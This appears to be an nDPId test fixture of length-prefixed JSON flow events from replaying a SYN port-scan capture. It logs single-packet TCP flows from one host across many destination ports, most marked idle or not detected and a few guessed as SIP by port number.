+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1676,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1751,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3007,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1042,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5060,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1849,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061207,"flow_last_seen":1278275061207,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5061,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1778,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5060,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3013,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5061,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5061,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3017,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3017,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058655,"flow_last_seen":1278275058655,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3017,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23502,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1861,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":23502,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":48080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":48080,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":981,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 